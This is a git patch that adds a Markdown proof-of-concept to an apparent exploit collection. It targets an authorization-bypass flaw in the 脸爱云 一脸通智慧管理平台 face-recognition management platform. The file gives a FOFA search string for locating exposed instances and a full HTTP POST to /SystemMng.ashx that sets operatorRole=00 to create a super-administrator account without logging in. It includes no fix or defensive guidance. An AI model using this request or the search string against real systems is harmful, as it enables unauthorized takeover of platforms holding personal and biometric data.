From db7cc769399d6810e8bfa40e14323023597658ec Mon Sep 17 00:00:00 2001
From: wy876 <139549762+wy876@users.noreply.github.com>
Date: Thu, 28 Dec 2023 19:46:47 +0800
Subject: [PATCH] =?UTF-8?q?Create=20=E8=84=B8=E7=88=B1=E4=BA=91=20?=
 =?UTF-8?q?=E4=B8=80=E8=84=B8=E9=80=9A=E6=99=BA=E6=85=A7=E7=AE=A1=E7=90=86?=
 =?UTF-8?q?=E5=B9=B3=E5=8F=B0=E4=BB=BB=E6=84=8F=E7=94=A8=E6=88=B7=E6=B7=BB?=
 =?UTF-8?q?=E5=8A=A0=E6=BC=8F=E6=B4=9E.md?=
MIME-Version: 1.0
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit

---
 脸爱云 一脸通智慧管理平台任意用户添加漏洞.md | 30 ++++++++++++++++++++
 1 file changed, 30 insertions(+)
 create mode 100644 脸爱云 一脸通智慧管理平台任意用户添加漏洞.md

diff --git a/脸爱云 一脸通智慧管理平台任意用户添加漏洞.md b/脸爱云 一脸通智慧管理平台任意用户添加漏洞.md
new file mode 100644
index 0000000..0a9b304
--- /dev/null
+++ b/脸爱云 一脸通智慧管理平台任意用户添加漏洞.md	
@@ -0,0 +1,30 @@
+## 脸爱云 一脸通智慧管理平台任意用户添加漏洞
+
+脸爱云一脸通智慧管理平台是一套功能强大,运行稳定、操作简单方便、用户界面美观,轻松统计数据的一脸通系统。无需安装，只需在后台配置即可在浏览器登录。该管理平台/SystemMng.ashx接口处存在权限绕过漏洞,可通过输入00操纵参数operatorRole，导致特权管理不当，未经身份认证攻击者可以通过此漏洞创建超级管理员账户，造成信息泄露和后台接管。
+
+
+## fofa
+```
+"欢迎使用脸爱云 一脸通智慧管理平台"
+```
+
+## poc
+```
+POST /SystemMng.ashx HTTP/1.1
+Host: 127.0.0.1
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/119.0
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
+Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
+Accept-Encoding: gzip, deflate
+Referer: http://127.0.0.1/top.html
+Connection: close
+Cookie: ASP.NET_SessionId=whnrkuaqbz0lyv1fbwtzf23y
+Upgrade-Insecure-Requests: 1
+Content-Type: application/x-www-form-urlencoded
+Content-Length: 175
+
+operatorName=test1&operatorPwd=123456&operpassword=123456&operatorRole=00&visible_jh=%E8%AF%B7%E9%80%89%E6%8B%A9&visible_dorm=%E8%AF%B7%E9%80%89%E6%8B%A9&funcName=addOperators
+```
+![image](https://github.com/wy876/POC/assets/139549762/8ae7871e-8eed-4986-a9f8-ad4168b15e2d)
+
+![image](https://github.com/wy876/POC/assets/139549762/ab201a23-b27a-40d5-9f80-46e1218f238c)